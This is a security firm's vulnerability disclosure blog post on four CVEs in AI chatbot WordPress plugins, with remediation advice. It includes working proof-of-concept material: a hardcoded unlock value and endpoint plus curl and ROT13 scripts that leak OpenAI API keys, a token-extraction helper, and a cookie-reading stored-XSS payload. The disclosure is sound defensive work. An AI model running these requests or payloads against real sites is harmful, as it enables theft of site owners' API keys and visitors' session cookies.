In our previous blog, ‘WordPress Plugins: AI-dentifying Chatbot Weak Spots’ (https://prisminfosec.com/wordpress-plugins-ai-dentifying-chatbot-weak-spots/), a series of issues was identified within AI-related WordPress plugins:

- CVE-2024-6451 – Admin + Remote-Code-Execution (RCE)

- CVE-2024-6723 – Admin + SQL Injection (SQLi)

- CVE-2024-6847 – Unauthenticated SQL Injection (SQLi)

- CVE-2024-6843 – Unauthenticated Stored Cross-Site Scripting (XSS)

Today, we look at further vulnerability types in AI-related WordPress plugins. They don’t provide the same adrenaline rush as popping a shell, but they clearly show how AI plugins are being rushed through development without thorough consideration of secure coding practices. Prism Infosec were attributed the following CVEs:

- CVE-2024-6845 – SmartSearchWP < 2.4.6 – Unauthenticated OpenAI Key Disclosure

- CVE-2024-7713 – AI Chatbot with ChatGPT by AYS <= 2.0.9 – Unauthenticated OpenAI Key Disclosure

- CVE-2024-7714 – AI Assistant with ChatGPT by AYS <= 2.0.9 – Unauthenticated AJAX Calls

- CVE-2024-6722 – Chatbot Support AI <= 1.0.2 – Admin+ Stored XSS

All vulnerabilities mentioned above were submitted to WPScan, who effectively managed the steps required to resolve the issues with the respective plugin owners.

CVE-2024-6845 – SmartSearchWP < 2.4.6 – Unauthenticated OpenAI Key Disclosure

WPScan: https://wpscan.com/vulnerability/cfaaa843-d89e-42d4-90d9-988293499d26

‘The plugin does not have proper authorisation in one of its REST endpoints, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key’





Within the plugin source code, specifically the ‘wdgpt-api-requests.php’ file, a REST endpoint with the route ‘/wp-json/wdgpt/v1/api-key’ was identified that allowed unauthenticated requests to retrieve an encoded copy of the OpenAI secret key configured in the plugin settings.



Reviewing the ‘wdgpt_retrieve_api_key’ function revealed an interesting check: the ‘key’ parameter sent in the request was compared against a hardcoded (not so) secret code.

For the request to succeed, the JSON body {"key":"U2FsdGVkX1+X"} had to be sent in the POST request.

This value was identical across all plugin installations, so sending it to the unauthenticated endpoint ‘/wp-json/wdgpt/v1/api-key’ allowed anyone to retrieve the ROT13-encoded OpenAI secret key.
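The request described above can be reproduced with a short shell sketch, assuming ‘curl’ is available and the caller supplies the base URL of a site they are authorised to test. The helpers ‘api_key_url’ and ‘fetch_encoded_key’ are hypothetical names for illustration; the endpoint's response format is not shown in this write-up, so the sketch prints it raw rather than guessing how to parse it.

```bash
#!/bin/bash
# Hypothetical helpers (not part of the plugin) that reproduce the request
# described above. Only use against a site you are authorised to test.

# Static value that was identical across all SmartSearchWP installations.
STATIC_KEY='U2FsdGVkX1+X'

# Build the REST route from a base URL, tolerating one trailing slash.
api_key_url() {
  printf '%s/wp-json/wdgpt/v1/api-key\n' "${1%/}"
}

# POST the static value with no cookies, nonce or credentials attached.
# The raw response is printed as-is; its exact format is not assumed.
fetch_encoded_key() {
  curl -s -X POST "$(api_key_url "$1")" \
    -H 'Content-Type: application/json' \
    --data "{\"key\":\"$STATIC_KEY\"}"
}
```

For example, running ‘fetch_encoded_key https://blog.example’ would print the endpoint's response, and the encoded key it contains can then be decoded.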

Decoding the ROT13 value with the following Bash script revealed the OpenAI key in use.

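```bash
#!/bin/bash
# Decode the ROT13-encoded key given as the first argument (ROT13 is its own inverse).
printf '%s\n' "${1:?usage: $0 <encoded-key>}" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
```

CVE-2024-7713 – AI Chatbot with ChatGPT by AYS <= 2.0.9 – Unauthenticated OpenAI Key Disclosure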

WPScan: https://wpscan.com/vulnerability/061eab97-4a84-4738-a1e8-ef9a1261ff73

‘The plugin discloses the OpenAI API Key, allowing unauthenticated users to obtain it’

Similar to the previous issue (but somehow worse), the OpenAI secret key was disclosed to every user of the chatbot. Requests sent to OpenAI carried the plaintext API key from the plugin configuration in their Authorization header, so an unauthenticated user could obtain the key simply by sending a message through the chatbot.

The OpenAI API key was configured in the admin console at the following URL:

- /wp-admin/admin.php?page=ays-chatgpt-assistant&ays_tab=tab3&status=saved

Once the key was set, the chatbot was available to unauthenticated users by default. Intercepting the chatbot's traffic showed that a client-side request was sent directly to OpenAI, containing the secret key in the Authorization header.

Request:

```http
POST /v1/chat/completions HTTP/2
Host: api.openai.com
Content-Length: 312
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"
Content-Type: application/json
Accept-Language: en-US
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer sk-proj-oL…[REDACTED]…sez

{"temperature":0.8,"top_p":1,"max_tokens":1500,"frequency_penalty":0.01,"presence_penalty":0.01,"model":"gpt-3.5-turbo-16k","messages":[{"role":"system","content":"Converse as if you are an AI assistant. Answer the question as truthfully as possible. Language: English. "},{"role":"user","content":"Hi there!"}]}
```
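Because the key travels in the visitor's own browser traffic, reading it needs no special tooling. As a minimal sketch, assuming an intercepted request has been saved as raw text (for example, exported from an intercepting proxy), the hypothetical helper ‘extract_bearer’ prints the token from the Authorization header.

```bash
#!/bin/bash
# extract_bearer (hypothetical helper): read a raw HTTP request on stdin and
# print the token carried in an "Authorization: Bearer <token>" header.
# HTTP/2 tooling often shows header names in lower case, so both
# "Authorization" and "authorization" are matched.
extract_bearer() {
  # Keep only the header line, strip its prefix, then drop any CR left by CRLF endings.
  sed -n 's/^[Aa]uthorization:[[:space:]]*Bearer[[:space:]]*//p' | tr -d '\r'
}
```

Applied to an unredacted capture of the request above, this prints the full ‘sk-proj-’ API key.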

CVE-2024-7714 – AI Assistant with ChatGPT by AYS <= 2.0.9 – Unauthenticated AJAX Calls

WPScan: https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664



‘The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ‘ays_chatgpt_disconnect’, ‘ays_chatgpt_connect’, and ‘ays_chatgpt_save_feedback’’





During source code analysis of the plugin, a function named ‘ays_chatgpt_admin_ajax’ was found registered through a ‘wp_ajax_nopriv’ hook, meaning WordPress would run it for unauthenticated visitors.

Further inspection of this function in ‘class-chatgpt-assistant-admin.php’ showed that it read a ‘function’ parameter from the request, checked only that the value was not null, and then passed it to ‘is_callable’, which is used to ‘Verify that a value can be called as a function from the current scope’.

In effect, any function callable from the scope of ‘class-chatgpt-assistant-admin.php’ could be invoked by an unauthenticated user.
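The pattern can be illustrated with a language-neutral shell sketch. This is not the plugin's PHP code: the handler bodies are hypothetical stand-ins, and ‘command -v’ plays the role of ‘is_callable’ by succeeding for any name that resolves to something runnable. The allow-list variant shows one way to narrow what a request can reach; for illustration only the feedback handler is treated as public, and in WordPress this would still need to be paired with a capability check such as ‘current_user_can’ and a nonce check such as ‘check_ajax_referer’.

```bash
#!/bin/bash
# Hypothetical stand-ins for the plugin's handlers.
ays_chatgpt_connect()       { echo "connected"; }
ays_chatgpt_disconnect()    { echo "disconnected"; }
ays_chatgpt_save_feedback() { echo "feedback saved"; }

# Vulnerable pattern: run whatever name the request supplies, as long as it
# is non-empty and resolves to something callable (cf. PHP's is_callable).
dispatch_unchecked() {
  fn="$1"
  [ -n "$fn" ] || return 1
  command -v "$fn" >/dev/null 2>&1 || return 1
  "$fn"
}

# Narrower pattern: only names on an explicit allow list are run. The caller's
# identity is still not checked here; that must happen separately.
dispatch_allowlisted() {
  case "$1" in
    ays_chatgpt_save_feedback) "$1" ;;
    *) return 1 ;;
  esac
}
```

With the unchecked dispatcher, ‘dispatch_unchecked ays_chatgpt_disconnect’ runs the disconnect handler for anyone; the allow-listed version refuses it.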

The functions that could be accessed from an unauthenticated context included:

- ays_chatgpt_disconnect

- ays_chatgpt_connect

- ays_chatgpt_save_feedback

By sending a request that invoked ‘ays_chatgpt_disconnect’ from an unauthenticated context, it was possible to ‘disconnect’ the running configuration from OpenAI, effectively causing a Denial of Service for the chatbot functionality.

CVE-2024-6722 – Chatbot Support AI <= 1.0.2 – Admin+ Stored XSS

WPScan: https://wpscan.com/vulnerability/ce909d3c-2ef2-4167-87c4-75b5effb2a4d

‘The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)’



Testing showed that the plugin's settings page did not effectively sanitise input, so malicious payloads such as JavaScript were accepted, stored, and executed within the chatbot for visiting users.



As shown in the screenshot, the payload ‘<img src=123 onerror=alert(document.cookie)>’ was inserted into the Starting Message input on the settings page at:

- /wp-admin/options-general.php?page=chatbot-support-ai-settings

As a result, the JavaScript executed within the chatbot whenever users visited the application.

Admittedly, exploiting this vulnerability required administrator privileges, and it matters most where administrators are not meant to have the unfiltered_html capability (for example, in a multisite setup). However, because the payload executed for every visiting user, it would allow malicious scripts to be distributed through the plugin, which could enable further attacks against third-party services under the guise of visiting users and their resources.
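The missing control here is escaping: a stored setting should be rendered as text, not parsed as markup. As a minimal, language-neutral sketch, the hypothetical helper ‘html_escape’ below performs HTML entity encoding and shows how the payload above becomes inert. In the plugin itself this would be done in PHP with WordPress's escaping functions (such as ‘esc_html’ or ‘esc_attr’, depending on where the value is output); if the message is inserted by JavaScript, the correct treatment depends on that sink, which is not shown here.

```bash
#!/bin/bash
# html_escape (hypothetical helper): encode the characters that are significant
# in HTML so a stored value is displayed as text instead of being parsed.
# '&' is replaced first so that entities produced later are not re-encoded.
html_escape() {
  printf '%s' "$1" | sed -e 's/&/\&amp;/g' \
                         -e 's/</\&lt;/g' \
                         -e 's/>/\&gt;/g' \
                         -e 's/"/\&quot;/g' \
                         -e "s/'/\&#39;/g"
}
```

Encoded this way, the Starting Message payload is displayed literally as ‘&lt;img src=123 onerror=alert(document.cookie)&gt;’ instead of triggering the onerror handler.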

Get Tested

If you are integrating or have already integrated AI or chatbots into your systems, reach out to us. Our comprehensive range of testing and assurance services will ensure your implementation is smooth and secure: https://prisminfosec.com/services/artificial-intelligence-ai-testing

All vulnerabilities were discovered and written by Kieran Burge of Prism Infosec.